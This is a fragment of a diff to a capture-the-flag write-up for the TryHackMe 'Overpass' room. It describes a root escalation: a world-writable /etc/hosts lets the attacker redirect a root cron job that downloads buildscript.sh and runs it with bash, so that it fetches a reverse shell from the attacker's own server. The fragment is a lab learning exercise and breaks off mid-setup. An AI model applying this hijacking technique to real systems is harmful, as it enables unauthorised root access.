singha-brother/ctf_challenges/TryHackMe/overpass/readme.md

 james@overpass-prod:/tmp$ ls -la /etc/hosts
 -rw-rw-rw- 1 root root 250 Jun 27  2020 /etc/hosts
 ```
+> It means root user is getting file from overpass.thm/downloads/src/buildscript.sh and run bash and the /etc/hosts file is editable

+## Root Access

 - can I make a server like this directory and put reverse shell to buildscript.sh in my own server

-- change my IP to overpass.thm in /etc/hosts file as it has rw access
-- In my machine,
+- In local machine,

 ```sh
 $ mkdir -p downloads/src/